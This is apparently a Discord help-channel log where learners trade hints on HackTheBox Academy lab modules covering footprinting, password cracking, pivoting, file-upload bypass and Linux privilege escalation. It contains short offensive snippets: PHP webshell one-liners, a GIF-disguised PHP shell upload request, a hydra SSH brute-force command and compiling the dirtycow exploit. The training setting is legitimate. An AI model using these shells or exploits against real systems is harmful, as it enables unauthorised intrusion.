#modules

Thats not how variables are referenced in Pwsh

change that to ${Message}

so I need to change all the variables ?

No, just that one.

Its on line 261 of the script.

you can open with vscode and skip there and make the edit.

Module: Service Authentication Brute Forcing

[ERROR] target ssh://83.136.250.104:22/ does not support password authentication (method reply 4).

I am receiving this error, in this given module

thanx

Can I please get a hint on "Footprinting" Host Based Enumeration - DNS. I'm stuck on What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I tried enumerating using dnsenum seclists 5000 of the top 1 million domains, no dice. I tried an iterative script that did dig -x for 10.129.[1-256].203 with no results. Now I'm enumerating using dnsenum again but with the 110,000 top subdomains but I'll be waiting for a while..

BTW did u tried to use Kerbrute??
cause I think I need a userlist for that (which make it kind of difficult since there's "2913 accounts")

You have to find all the zones.
Since you don't want to send the NameServer straight to nirvana, use the smallest list under SecLists. 5000 entries are too many 😉

Thanks I'll modify my approach, poor server is already in Nirvana for sure.

Youre welcome fixed yeah?
I prefer to just use crackmapexec(netexec) if you know pass pol

Havent done that module yet. But I prefer to gather users with rpcclient and spray with nxc

I barely use kerbrute.

yes, U were right on the spot

well in that specific problem gathering users is a bit of extra work so using "DomainPasswordSpray" make it easier

also in the long run it's better

Yeah the first time it is, but I have a sed command that cuts out everything else and leaves just the usernames in the straight brackets from rpcclient

Guys which is the best module for beginners

It is best to start with the Information Security Foundations path.

At a time how many module I can use

Linux Fundamentals, Windows Fundamentals , Introduction to Active Directory and Introduction to Networking are also all good.

Penetration testing Process is too

Oke then

@fathom pendant I found out something interesting yesterday, I am telling you this for future instance, in case you don't know it: You can set the timeout on the SMB for bigger files: smb: > timeout <n> (n- amount of time you wish to be set).

Hi guys. currently trying to complete the 'windows fundamentals' module and I'm on the skill assessment. i'm up to the step of creating a local group however I keep getting 'system error 5/access denied' when i try. would anyone have any hints as to what to do next?
Ive tried adding myself to the administrators group, giving myself full permissions but im once again met with the same error.

Thanks @acoustic owl a good reminder to branch out into different lists, I really thought if it had 5000 it had them all!

can i get help with this please

You post a random screenshot without specifying the module, section, question and what doesn't work?
How is anyone supposed to help you?

Module: Service Authentication Brute Forcing

[ERROR] target ssh://83.136.250.104:22/ does not support password authentication (method reply 4).

I am receiving this error, in this given module

posted that before the screenshot^

hydra -L bill.txt -P william.txt -u -f ssh://83.136.253.251

this command doesnt work because apparently the ssh service on the machine im supposed to brute force with hydra may have been set to "no password"

i did try resetting the machine mind you

What question do you need help with? There are two questions

The first one

i know im supposed to brute force one user but that doesnt work either

With this task you get a Docker container. This means that you must always use ip AND port.
By the way, the username is already given to you. Look at the question again.

tried with that username, got the same result

Because you are attacking a random machine on port 22. But the port is predefined for you. You must use this port

so the IP of the target is a random machine?

Hi @clever bronze I just spun up the target in the module and tested. If you are unfamiliar with UAC prompt, make sure you are getting one before you create the group.

Your destination can only be reached via this port. Everything else is not your target server

SMH

why would they ask it this way

No, it's a computer with theoretically thousands of Docker containers.
Your container, i.e. your target, can only be reached via the specified IP:port combination. Everything else is not your target server.

bc is a docker container

It’s a clear question, and it clearly states the target. You just don’t read 😌

^

that port is mapped to the internal port 22

maybe, maybe not. You can run SSH on every port you want

https://tenor.com/view/angry-angry-cat-mad-cat-mad-death-stare-gif-2007099240114134459

ok

ok thanks lawless gonna try again with fresh eyes tomorrow. appreciate the time you took to reply

https://academy.hackthebox.com/module/15/section/453

It is actually well described here

i will keep that in mind, i forgot 🙂

no worries you'll be a proficient windows administrator in no time.

I have a question regarding the "Active Subdomain Enumeration" module. I completed all the answers but I'm not entirely sure if the rationale behind each step is correct. Could someone go through the notes I wrote and confirm I've correctly understood each question, and how to approach it?

Wsg y'all.
Password Attacks - Hard Lab - I have been trying to dump the sam hashes, but no success.
Anyone got ideas?

p.s - Already mounted the .vhd and cracked the bitlocker hash.

I tried secretsdump and samdump2.

hello i have a question. Is hackthebox’s training refer to modules?

Solved, I am just brainless.

Thank you. Turns out I rolled the local admin pw in an earlier attempt, that ended up modifying the hash i needed for the answer. Went down a few rabbit holes on this one, but a good learning experience. Thanks again. 🙂

Here's a question about not any one particular module, but rather all of them. Would anyone be willing to share their note-taking/report drafting "flow"? I'm still pretty early on, and I understand the concepts and importance of note taking. However, I'm curious how you guys are taking notes in a way that isn't interrupting your current thought process or clunking up your attack process. Hopefully that made sense?

Sure, basically I do note taking in 2 different ways:

Theoretical and practical. The most important info that regards examples of usage and concepts are going to my theoretical document which takes into consideration a whole module - So 1 .docx theory.

The next one is a practical .docx where I have taken screenshots of the way I have gotten to the flag.

And finally, I make a file on paint3D (doesn't really matter) where I draw the chain/attack vector.

So there's 3 types of documentation I do.

I can provide you with an example in DMs.

Of the way I take notes down.

Thanks for sharing! Right now I seem to just "get in the zone" and push through a machine/excercise and taking notes becomes an afterthought rather than an active part of the engagment

All good, man. Ping me if needed.

I think I just need to get in the reps of note taking for it to become part of my process

Yeah.

note down the commands at the end of each attack chain/major steps, then you can furish it out afterwards, the commands themselves will be enough to help you remember what you did

That's an example of the amount of screenshots for the password hard lab.

^ ( extremely important)

Someone made a file specifically with these commands.

https://youtu.be/dRW1Gxmu__Q?si=srPbY-NIIGuV9nov This is guide for CPTS but has high emphasis on note taking.

Istg I am gonna get that CPTS and hang that on my wall.

I think you'll benefit a lot moving to a proper note taking application, I use obsidian with the excalidraw plugin to make network diagrams and attack chains, everything is done inside one app

can't image using ms word to notes

I can see the ||code|| ,and with ||iframe|| I can extract most of the ||orders in the xml|| except for some ||comments that are arrays||. I also tried ||ssrf with interactsh, as an alternative to iframe for exfiltration||, but it failed, so I am left with only ||iframe for exfiltration||. Am I on the wrong path ? If yes could you give me a hint ?

Ehh..I prefer cherrytree.

yeah that's fine, anything but ms word

in the module shells and payloads I was trying to follow the laudanum demo but I cant find the webshell I just get 404s. (\files\shell.aspx)

I also attempted \files\shell.aspx

it wont let me put 2 dashes but I did attempt that as well lol

Change direction of slashes?

I just redid this one the other day and got it just fine ¯_(ツ)_/¯

yea both ways

I just got it to work by booting up my vm, pwnbox problem ig

I tent to dump everything in notepad ++ while I am attacking then move it to cherrytree after and clean it up there. I was using obsidian for a while it was great too.

its extra work but its the way I am lol

Hello could someone help me with the HTTP Response Splitting Section of the HTTP Attacks Module?

@kindred jewel i had to run powershell as admin 😩

You need to try ||xpath injection||

Of course I'm doing it already, that's how I extracted stuff, but this doesn't answer the questions I am stuck in, which are : am I exfiltrating correctly, and what data am I missing in the exflitration, please check again my previous comment

The way you've framed your message doesn't even whisper the ||xpath injection|| all you've been mentioning is iframe. What you can see from iframe is limited. I don't understand why you're even trying to ssrf with interactsh. You can forge your injection query to just get what you're looking for if you're already trying ||xpath injection||

Using the iframe is correct, however look through the XPath - Authentication Bypass section again as there is a method to exfiltrating data from there, you may need to modify the payloads from there however.

Ok maybe I'm overcomplicating. Sorry if it wasn't clear I'm trying not to spoil too much, I thought my mentioning of the ||xml orders and array comments|| made clear I was doing || xpath injection|| already

I didn't understand what array comment meant, I'm still new to this stuff myself. But you don't need to overcomplicate. You said you got the code, and I'm assuming thats the source code of the internal applicaton correct?

Yes exactly (there are some ||comments that are xml arrays|| in the exfiltrated data, but maybe it's irrelevant)

I don't remember seeing any valid code being commented out. But, any case yeah, that's irrelevant.

What should be relevant is only the line of code which takes user controlled input.

ok (I meant ||nodes named "comment"||). I was definitely overcomplicating it.

Thanks ! it helped

no prob!

odat docker image doesnt exist for my m1 cpu...i just hate this module so much xD

Hello. I'm stuck on the Linux Module, i have googled, read manuals and tried the best I can.
The question is: How many total packages are installed on the target system?

section?

u mean this? File Descriptors and Redirections

did you try apt list --installed?

yes

look at the first few lines of the output to adjust the number

Hello, I have a stupid question regarding authebtication coercion chapter in the ntlm relay attacks.
For instance, are the Rpc methods used(RpcOpenPrinter, RpcEFcDecryptfile, ...) implemented server side or client side?

server side, it coerces a server into initialing a ntlm auth with your listener

cant figure it out...

apt list --installed | head what do you see?

a warning. and why "| head", i thought i should use "| wc -l"

because I want you to take a look at the first few lines of the output, you see the extra line there?

yup

blanks?

Hey there

i need help on LFI

there's one extra line before the packages are listed, just -1

@next bronze so those are the names of the methods implemented on the server, and then they get called from the client?

i'm on this section here

oh ok thanks!

here is what i have tried

oracle-instantclient-devel and oracle-instantclient-sqlplus cant be located, anyone came across this issue?

yep, from the coercer repo

Tries to connect on a list of known SMB pipes on the remote machine
Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.

How to find maker of a module?

aka Introduction to Digital Forensics

It should show you under the modules details

gotcha, I was looking at the module completed page

are those their discord handle?

I wanna reach out to them to ask for the intended solution

I know few of them that have it the same as their discord handle. Not sure about everyone else.

looked for those names at the search function for this discord but found nothing

volfar, leoleg97, MadhukarRaina

Hey guys, i'm trying to download the opnvpn so I can do some hacking challenges, but how do I actually get the file into my VM in the first place?

volfar is in the server, but not sure about just dming

download from vm directly, set up a sharing between host and vm

hmm, which thread should I ping him on?

yup I overthought it

oh nvm idk how discord works, I can't do @volfar

@next bronze thans a lot.
I wasn't sure

I have no clue, they don't have any messages on the server

who in this earth could shed some light in this accurse dfir module question? lol

maybe I'll message support

Hey all - i am trying to run msf for the attacking common application module for the section attacking wordpress. I am trying to get the flag and use this method...but the payload doesn't go through at the end...any advice here?

i swear that when i click in reveal would appear "harder"

Lmao

BROKEN AUTHENTICATION ---> Skills Assessment - Broken authentication, I have decoded the cookie, but when I place the user support cookie, it tells me this, can someone help me?

I have fuzzed for the user admin, administrator and others but it tells me that the user does not exist...

don't see an option to send a message to support

anyone on assistance with the above ask for the section attacking wordpress under attacking common apps module?

writing a webshell into a theme would be easier than using msf

probably because it's holiday season, you can still email them

it said for critical urgent thing, email, I'll just wait lol

I agree on the webshell written to theme

@next bronze

does it matter which i use?

||system($_GET[0]);

system($_GET['cmd']);|| and then i am assuming i can just curl the file?

super simple and lots of webshells to choose from out there

if you are able to write it into a theme you should be able to browse that path and have a webshell to use. I have not made it to that section but that is how I have done other boxes. I dont see why this would be any different

^ this, and doesn't matter what you use as long as the paramerters are passed correcrly

I forget the specific webshell that I have seen people use here but there are a lot of them

its nice and looks like a terminal. Really well made

ok...wasn't sure if it mattered much, but thanks..will go from here and see

p0wny-shell? probably too long to write into a theme, the most basic one liner will do

in Footholding/Oracle TNS i was able to upload a reverse shell, login and enumerate, now my Pwnbox died, and i cant get odat.py running again, can please someone give me a hint, do i even need to get a reverse shell and manually dig in the machine?

Guys, i'm trying to pwn the dancing box in the starting point module and i'm so close to finishing but for some reason I cannont connect to Workshares, can anyone help?

iirc you should get a set of creds from odat then login to the db and find the answer

yes i got the creds, i tried DBeaver, but just blank entries, sqlplus doesnt work on my machine

not sure about that, I used sqlplus, use pwnbox then

I believe sqlplus is needed but it's been a minute

it doesnt find dependencies for sqlplus when running the installer script provided

oracle-instantclient-devel
oracle-instantclient-sqlplus
cand be found with sudo apt install ....

try running apt update first

i did

why tf does pwnbox doesnt even have docker installed

Because it's it's own virtualized web instance 2hard

so oracle-instantclient-devel is in the kali deb repo but not parrot

I'm gonna have to grep and see if it's in mine and if so: then they removed it

no way, im not gonna deal any longer with this bs, i wanna exploit and not fix tools xD
i skip this Oracle TNS, dealing nearly a day on this crap

you got the creds right?

ya

dm

IPMI is interesting, never heard of it before 😮

Hello guys can some one help me on Borken Authentication Module? on Brute Forcing Passwords?

i understand all and as said we need the rockyou-50 but there is only one password matching for it but this is not the right one... maybe someone can tell me what im doing wrong

I tried to extract the service hash for the mssql database. I am trying to crack it using -m 1000 and the pws wordlist provided in resources. I still cannot crack it. any advice as to what to do now?

That's not the right hash mode

are you bruting the right user/page? if you have found the pass it should be the answer

ok

I will try other ntlm hashes

The module mentions what kind of hash that is and which mode goes with it

no if burte this is also not working. but as the question sais i expect at least the password in it with the matching cretieria ? or im wrong ?

that's not the right password, find the password policy by creating an account

can i write you a pm? dont want to spam all here?

So I followed a blog for ntlmv2 hash crack got the mode but I am getting separator error

Hi guys I'm stuck on password attacks lab - medium. I've both creds of Jason and Dennis ssh, any hints on how to get root?

with Dennis you mean?

yep

you need to specify an attack mode -a 0 for wordlist

yeah I've already cracked his id_rsa

then ssh with it

I did

you are on the right path

use the ssh key to log in

|| test ||

ok sorry

try to log in as that

you missed mssql:: at the start

grab the full hash

oh ok

got it! thx

It accepted the hash but I still could not crack it. trying rockyou

rockyou also did not work

If anyone is available to chat about the "CrackMapExec Skills Assessment" I'd appreciate it. Stuck on Q3...

module and section?

Module attacking common services
section attacking sql databases

Also take a break if you are feeling that you are hitting a wall

Doing everything on autopilot is not something that I would recommend

iirc the wp site is served on a vhost. That might be why it didnt work.
But eitherways its too eez to whip out msf. Just use a plugin or theme.

it should be in rockyou, make sure you got the right hash, capture it again

I enumerated with the cred provided in the section. discovered 2 databases hmail and flagdb
I tried to access them but could not
I tried to look for people to impersonate. there were none
I then tried to extract the ntlmv2 hash and this is where I am

I have tried to crack the hash in -m 5600 with wordlists provided in the section and rockyou.txt both resulted in nothing

I captured it again got a different hash but that too did not work

but both the wordlist did not provide any results

I even tried the user wordlist provided in the resource

might be how you're copying it, copy the full hash, then use a text editor to past it in

The $ points to the EOL and there is not space at the start

got the pass

I used the wordlist at /usr/share/wordlist/rockyou.txt

Module: Linux Privilege Escalation
Section: Kernel Exploits

downloaded exploit and ran gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit but cant run it... even in sudo

that wordlist only has 333 passwords in it

and it worked

i mean as root

─(root㉿kali)-[/home/kali]
└─# ./kernel_exploit
error: Operation not permitted

why is this operation not permitted?

got it?

yes

The small rockyou worked and the seclist rockyou failed guess both are different

oh I meant the rockyou you used originally only had 333 password in it

the one you used should be the big one

I have a question. the 'Database user' they are talking about...are they talking about the user that I submitted as an answer to the third question of this module:

"What is the password for the database user? "

https://academy.hackthebox.com/module/143/section/1421

Nevermind

Is there anyway to do the shells & payloads live engagement from your own personal vm? If not any tips on speeding the lab up a bit?

pivot through the 172 machine

reverse shell to my own vm?

no

i could repeat my statement but would not make it clearer

i had not this issue, try other directory

htb-student@NIX02:~$ ./kernel_exploit
./kernel_exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./kernel_exploit)?

what do i do about this?

compile it statically

w8 you were doing it in your machine which is patched, makes sense

gcc -static -o kernel_exploit kernel_exploit.c
like this?

try instead of asking

this field is 99% about try and error

so i got htb-student@NIX02:~$ ./kernel_exploit
usage: dirtyc0w target_file new_content
thanks... i will try to figure it out from here

nice 💪🏻

thats working

in the github you have some examples

okay

tyvm i was so confused

nevermind

be more confident about your skills

at the end you were doing it by yourself

🙂

Footprinting / Assessment Easy

the hint says, to keep in mind that an ssh key needs specific permissions.

so i think i have to get the private key, which may lay on the ftp.
anonymous login not possible, but with given creds (server dont show me files).
there is ftp p21 and ccproxy-ftp 2121 on the system.

i dont want to use brute forcing or a metasploit module for now.

what steps would you guys make?

scan both tcp & udp😉

yeah got some udps too
53, 68, 623, 28493
i already tried the 623 for brute forcing IPMI

Is the Citrix Breakout (Windows Privesc) unstable for you guys ? It keeps crashing before i can do anything...

On the pivoting, tunneling, and port forwarding skills assessment, how am I supposed to find the right IP address for the username I found on the pivot machine that starts with v?

CME, check out password attacks

enumerate is always the answer

i did use some dig to get the zone file, got some IPs, but which 3 should i test?

test all of em

but i do not need to use dnsenum right? because they say its an production server and im not allowed to use exploits/brute. so ima just test different stuff like mail login on those ips found by dig ?

If I had to use proxychains to RDP into a machine, how do I transfer files with SMB if there is no path to my attack machine?

Is there a way to do the transfer with proxychains?

I tried using impacket-smbserver and then on the target machine I put in "net use n: \10.10....." and it is telling me that there is no path to the network.

This is the error I received

Basically I'm trying to get the SocksOverRDP zip folder onto the target machine in the skills assessment for pivoting, tunneling, and port forwarding.

rdp has built in file transfer capabilities

mount a drive over rdp, if you want the internal host to be able to reach your attack machine you need to set up a reverse tunnel

or if you have a cloud vps send files there and from victim use scp or wget or something 😄

were talking about in the module lab which wouldnt have net access

so in real world sure thats viable, but not here

ah got it

Okay, I found someone had used the /drive:linux,/home/kali method. Was this covered in the file transfers section or is this just something I should know?

I went back and referenced that section and didn't see anything.

Or was it in this module?

it's under Miscellaneous File Transfer Methods from the File Transfers module

Oh sweet, thank you. I even looked in misc, but must have skipped over it.

How do I find the IP of the user with the first letter v in the username.

this was answered, spray/enumerate it

I'm not sure how. Can I nmap over proxychains in this case?

you can proxychains anything that makes full tcp connections using standard socket libraries

i.e yes

This is what I have so far prior to starting nmap, which ip should I be using, the 16.6 or 16.5?

finally i got the god damn ssh key for footprinting - easy lab

I guess I mean which subnet?

I'm on 16.5 currently, but I don't really understand this output.

I got nothing on proxychains for 16.6, and 16.5 is the same results as before.

I mean this is an element you need to figure out. You should understand subnets as a course pre-req

I understand subnets, I'm just not sure why this is set up the way it is.

This one is hard.

¯_(ツ)_/¯

still cant answer for you on this, its part of the skill assessment

I'm not getting any results though on proxychains for 16.6. Will this even work for that subnet?

Nobody can answer that for you

you should have your own map of the network and how your proxies are setup. This map can be mental or it can be literal

Why not? I'm pretty much stuck.

Because its a skill assessments

guys, am i wasting my time learning if If I'm not good at this

Its assessing your skill, not your ability to ask others to solve it for you

Or Ill put it another way. if youre so stuck you cannot figure out this step without help then I gurantee you will fail the exam. This is mandatory knowledge and needed skill.

I keep flying through things easily until I get to the assessment, @analog charm. I am stuck on the very final part of the File Upload Attacks. I got through everything else, but now I just cannot get the final item up. You are in good company. We all start somewhere.

Its normal to get stuck

https://tenor.com/view/jake-adventure-time-sucking-sort-of-good-gif-22475109

Being able to push through and figure it out separates the people with no capability and those with capability to succeed

Thanks for the message, hope you get unstuck in the file upload attack

❤️

finally, that EASY lab wasnt easy imo xD

As a mode of encouragement, hack the box easy, does not translate to the definition of the word easy most use.

footprinting?

Thank you. I have been at this last item for about three hours. If anyone wants to help and tell me why I cannot get the darn image uploaded like I could on all of the others ones would be nice

Okay, I figured out proxychains is not working for some reason. I am able to ping from cmd on the pivot host and get two ip addresses, but they timeout with proxychains.

you cant ping with proxychains

thats ICMP

I feel like they used the box convention of difficulty = steps needed

No I pinged from CMD on the pivot host

I know

you cant ping through proxychains

because its ICMP

yes: f0x just explained WHY it doesn't work through proxychains LMAO

proxychains cant proxy icmp traffic

^

Wish i could help you but i really dont know so i can just hope it gets better for u

I did proxychains nmap -v -sn 172.16.6.1-255

no results

ye

Google how to use nmap and proxychains.

No worries, thank you though. Just breath. I knowthat sounds clichie, but breath walk away if you need but breath

definitely for footprinting (and the skill assessments in general) read the god damn brief

it helps to at least know a portion of the services we might be encountering :)

yes this will obviously not return anything

I'm just using what was in the module

-sn is to not port scan, so it has to use icmp or stuff like port 80 for host discovery

heah imo they made a rabbithole with all the open services and they say in the brief to collect as much data as possible from DNS, but that ws not needed at all 😄

and icmp doesnt chain through proxychains

literally the sentence after that explains why this won't work

you cant copy paste through stuff

So what is the enumeration method?

read the section

I didn't copy and paste, I changed the IP and range to cover 1-255

....

https://tenor.com/view/bruh-gif-24935909

youre running commands and flags without understanding what they do. thats copy pasting

I do need some direction, please. I know it is an assessment, and I do not want the actual answer, but for the File Upload, all I can seem to do is the SVG stuff. Everything else is giving me a message about it needing to be an image.

Only images are allowed

That

I even tried the -Pn scan and it didn't work either for port 3389 or any other port for that matter.

well what conclusions can you draw from this

One more important note to remember here is that we can only perform a full TCP connect scan over proxychains. The reason for this is that proxychains cannot understand partial packets. If you send partial packets like half connect scans, it will return incorrect results. < from the esction you screenshotted

1. that host doesnt exist
2. that subnet isnt where you should be looking for
3. your proxy doesnt reach the subnet

4. you did a syn scan not a connect scan

use burp to change content header, find non-blacklisted extensions as the hint says

5. the host firewalls those ports

I did, I am pretty sure anyway, lol. I have the SVG items, it is just this dang final part to create the shell is what is beating me now. No matter what file extension I use, I am getting Only Images are allowed

That I can ping from the pivot host from CMD and get two IPs. I ran a script to ping all of the 172.16.6 IPs and got two. So I know one of them is the one I need. I am just going back to figure out how I could have done that using the methods taught thus far in the modules, because the script I used was just something I found online. I'm trying to reinforce my knowledge of the methods taught, not use workarounds.

upload a valid jpg/png to bypass the front end validation, test extensions that can bypass both black and whitelists -> think of ways to bypass the content type filter -> think of what you can do with an svg -> attack it like a whitebox after this. - Its easy just calm down and go over it again.

cool, so with that knowledge examine which scenarios still remain plausible

you can't get a reverse shell, it's a docker target

Okay, I will calm down. I did get the SVG items. That was the only easy thing, lol

I am trying to use something from the modules to solve this. It's frustrating because now I know the answer, but can't find it with any of the methods taught on HTB.

youre not paying attention

^

think of why that is happening? is the application recognising only one part of the extension?? return to the sections and understand this and apply.

The instructions say that we need info and other parts of lesson showed to create a shell Try to exploit the upload form to read the flag found at the root directory "/" oh well I will try

yeah webshell is ok, not a reveshell

You can use a webshell, all you need is to read a flag. Worry about getting a shell later XD

To what?! I already know the answer, but I got it using a different method. I would like to know if there is a valid way to do this with the course material, or if it's one of those classic HTB Academy "great you figured it out even though we didn't teach that material" scenarios.

there is no classic we didnt teach that material

I'm trying to make sure I didn't miss anything. There's a lot of material here.

Its there, calm down and go over it again.

youre just not understanding the material and then getting surprised when you dont understand the answer

and then blaming htb

again

I already have the answer

How do you think I figured it out?

Do you think I guessed?

Do you think I used methods outside the course?

Did you use a ping sweep or something from the module. If so what module?

Cause I didnt. I had proper fundamentals and understood the material when it was taught

nmap and the pivoting module

You two should duel...

there is a really helpful nested for loop script in that module, you can use that to solve all the sections without even thinking all you gotta do is tweak it with more extensions, fuzz and spot the responses.

😂 frfr💀

Im just trying to prove a point that ones own misunderstandings cant keep constantly be blamed on others

I don't disagree with you

https://tenor.com/view/yu-gi-oh-kaiba-gif-11244264

He doesnt get the material. doesnt get the tools, and then complains that HTB hasnt taught him correctly

which pivoting module?

I do not even recall any loops I will try in a bit I am getting annoyed that I have een on this one for like four hours and I know it has to be someting simple

literally the one youre doing

I think you're meaning to ask "section"

I started this skill assessment, after an hour of trying to get in I realized I was using the wrong upload button (the submit button) sometimes you need to take a break off and return with the mentality of killing the section. - In around 2/3 hours I was able to solve it

Yeah, probably section

"probably" I'm making assumption for you to clarify - not say 'probably'

Yeah it froze earlier so I reset

No specific section, understanding taught concepts

Thank you. I had a similar issue with another module recently it made me feel like I was going bonkers

So I'm assuming the module would be this

This was after taking a 4 hour nap because I realized I was drained.

yes

and then these are the sections

correct

Module > Sections

I'm just trying to figure out what section then

no specific section

All the best!

all the sections are different tools for pivoting

The concepts are the important peice

you need to piece things together conceptually

I know I'm missing something and I could use a hand, it seems like everyone on here is so combative.

Thanks I am just sick of the Only Images Are Allowed

😂 not really

I just want to know what I'm missing

Because everytime someone tries to lead you down to figuring out the answer you start crying about not being handed the answer or that htb didnt teach you it just cause copy pasting doesnt work

and when told that lack of fundementals is likely the core issue. you claim you have the fundementals

This exact error is a dead giveaway on what double extension to use if you pay very close attention to the section on whitelists 😅

its combative because you rarely take responsibility for your own struggle

I thought it was one with the regex, but I could not remember also should I be getting that error is it is just name jpeg or gif with the gif8?

everytime madfox starts this, I begin to ask myself if I really know the fundamentals 🤣 cause dayummm

I listed multiple scenarios that could be causing your issue in proceeding, and you dismissed a couple of them(which good! you should, be eliminating the unlikely scenarios first!) and then you gave up and didnt acknowledge any of the others ot try to troubleshoot those scenarios

So I am convinced that there is no other way to do this portion of the skills assessment without using the ping method directly from the pivot host from the CMD line.

I think most of your replies are the way they are because of the experience/insights you have gained from the exam and you be like "The exam is wayyy harder than this man, you gotta brace up and figure this out without a handout" 😂

And I told you thats wrong

Ive literally said this 😂

I found the command on the forums when I got stuck

It's giving...

https://forum.hackthebox.com/t/skills-assigment-pivoting-tunneling-and-port-forwarding/261803/28

and I totally understand that 😂

It's actually my self portrait

The ping sweep worked, and I don't see anything else that would work besides that.

I'm not going to post it because I'm pretty sure it would be a spoiler.

it would and congrats for cheating yourself once again

Gunna be real useful for the exam

the one that starts with "for /L %i in..."

Password Attack Lab - Medium

Everyone previously in the discord has said they need to get to dennis for root access. I have no idea how they got this info, as i'm currently logged in as ||json in the mysql|| and see dennis but not sure how you're supposed to know to use him

Id advice you make a cheatsheet and specifically a section of technques to find live hosts on a subnet

This was in the module for cmd.exe iirc

it's called logical steps: if nothing else is working, why not

you get creds, so why not just say 'Fuck it' and try them

So you're saying I'm right and there's no way to do it with proxychains? I'm confused.

This is the skill assessment for pivoting/tunneling you are struggling with right?

I get that, but theres at least 100 different creds in the database

yes

yes; and i would also implore you in the future to look at /home/

and hes struggling with host discovery through proxychains

Did you try pivoting or tunneling. 😄

LMAO

Alright ty

Im telling for a fact I didnt use ping

first thing I do when i gain access to a system is check /home/ (or for windows C:\users\)and see if /root/ is left improperly managed

Then what did you use? Feel free to DM me if you want to avoid spoilers.

I actually already told you when troubleshooting your issues

^

I feel like I've tried everything and I'm stuck

Ahh I just checked and found dennis. Thanks for that tip, i'll include it in my notes

well, I'm not stuck, I have the answer, I just want to know the other method

or rather I was leading you to solving it but you started ignoring any advice I was giving lul

Im saying know when to use which, understand why one technique wouldnt work, pick which is more efficient for you. e.g I dont use powershell for live host discovery because all the for loops I have found take forever. The clearly stated you can only use proxychains+nmap with a connect scan -sT in the modules, proxychains is bad at handling half scans(incomplete packets/connections)

understand how nmap works, check that youre actually proxying to the subnet correctly. then craft a correct nmap scan

I tried nmap with proxychains, unfortunately it did not work.

its that simple

and I used the 17.6 vice 17.5

you tried nmap with the -sn flag

No, you tried nmap with proxychains incorrectly and it didnt work

Yeah then I did the -Pn

and you also never confirmed that your proxy was correct

proxychains nmap -v -Pn -sT 172.16.6.1-255

and you're proxying how

and I am already in with proxychains through rdp for the first host.

I used ssh -D 9050 for the initial one

then the proxychains xfreerdp

So am I missing something?

Okay, if I could get one question answered why am I getting only images are allowed when the file is just shell.jpeg and Content-Type: image/jpeg

Regular images are uploading

I'm not really sure what your actual question is at this point to be honest

it probably checks for magic bytes

what is the content of your "shell.jpg"?

Essentially.

I tried jpeg and jpg depending on the file extension

What are magic bytes?

any of you guys here working in the field?

"File signatures"

go back to the Type Filters section

I did try gif and GIF8

and if that didnt' work, try other formats

It should work, I recall getting it done that way.

That was the first thing I tried. I will try again. Wish me luch, lol.

I did try to upload an image with a double extension and that did work so it is the file itself.

So proxychains did not do it for me, after rereading the whole module (not just the section) I found this

This is what I have

Content-Disposition: form-data; name="uploadFile"; filename="test.phar.gif"
Content-Type: image/gif

GIF8
<?php system($_REQUEST['cmd']);?>

and I am getting this

HTTP/1.1 200 OK
Date: Sat, 30 Dec 2023 01:29:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8

Only images are allowed

So I'm guessing nmap proxychains is not the method?

Can I get a hint please as to what is the correct method?

The correct method for WHAT exactly?

For getting the ip addresses for the 172.16.6 subnet

I already found them for the skills assessment in pivoting tunneling and port forwarding, but I was asking earlier about how to find them without pinging the pivot host.

Or I should say pinging FROM the pivot host using the cmd line in windows

I don't remember the section exactly but if gif doesn't work, try another format like jpeg

fuzz for allowed content type.
Youre using the wrong one. read the page source with "A method" and see why thats wrong.

I thought I have tried them all out I am still not sure what magif bits are

I had just edited the source and removed the JS tht was doing front end validation

id advice you only use valid image extensions always, use GIF only for magic bytes.

you can add jpeg magic bytes but gif is easier yes

I mean for content type sorry.

I mean the backend page source.

Okay I will try that again I never give up but today has been harder than normal

Revise the type filters section and Limited file uploads, use the content-type.txt text file there to fuzz. All the best!
There is a very satisfying feel when you figure it out yourself.

I know there is, but I am not sure what you mean with the other stuff though I will reread I am glad I got the svg all on my own

https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt

I will try I am just sick of this darn only images are allowed no matter what I do. I think it has actually almost been five hours.

nmap over proxychains never worked. I finished the rest of the skills assessment though.

bummer. worked for me

Do you mind sharing which options you used?

I used proxychains nmap -v -Pn -sT 172.16.6.1-255 and directly to the ip that I knew it was.

Got a whole lot of this

Out of curiousity... where are you getting 6 from and why

From the pivot host

So, what are your tunnels.

When I connected to 172.16.5.XX

Think about this carefully.

Tunnels I used:
ssh -D 9050 -i id_rsa webadmin@<ip>

then I used proxychains xfreerdp to go to the 172.16.5.XX host

yup... and then what?

tip : ||its the content-type, read the web server php files.||

Thank you. I did copy both of those SVG file outputs into Obsididan what I use for my notes.

I got into the RDP session and pinged the 172.16.6.XX range because proxychains nmap was showing everything as down in that range

I have upload.php and common-functions.php

cool from here its just spoilers.

I mean I first used the hint to get creds/username, but then that's what I did to find the ip for those creds/username

I'm all finished with the module now

I just want to know what the alternative method was to finding the other ip besides what I did.

so then can your pivot host reach the 172.16.6.0/24 subnet? or only the 172.16.5.0/24 host you rdp into can?

Think about what your tunnel is actually letting you touch.

I was able to complete the rest, so yes.

Everything was easy besides trying to get the IPs

That is not correct...

I used mstsc.exe and used the remote desktop connection, so yes I had a path.

It was finding the ip that was the issue.

Let's try this. Are you able to nmap the first subnet, i.e 172.16.5.x

you just explained why it wasnt working for you

you never proxied to the host. you used a different tool to complete the final hop

a hop nmap never had access to

^

I had issues with that and did a ping script from the ssh session

always remember the a <--> b <--> c's

you needed to setup a second pivot on the final host before your target

You're tunneling incorrectly.

Moreover incompletely.

ssh -D 9050 -i id_rsa webadmin@<ip>

then I used proxychains xfreerdp to go to the 172.16.5.XX host

what else am I missing

Think about it...

if !b <-- c then a ! -->b -->c

the pivot for 172.16.5 to 172
16.6

instead you just connected directly from the middle host

think of the double pivoting module

you never pivoted a second time

You can reach 172.16.5.x from your initial foothold... there is a second pivot to 172.16.6.x FROM 172.16.5.x

which oh hey one of the scenarios I told you could be at fault, your pivot was wrong

Yeah, I was able to use mstsc.exe to get the remote connection

My dude...

That is not a tunnel

you're missing the point

What is the missing step to find the ip?

brother

Are you trolling us hard rn?

you were explicitly told

that's what we've been trying to tell you

my brother in christ

you are tunneled to your attack vm from a, so you can reach b

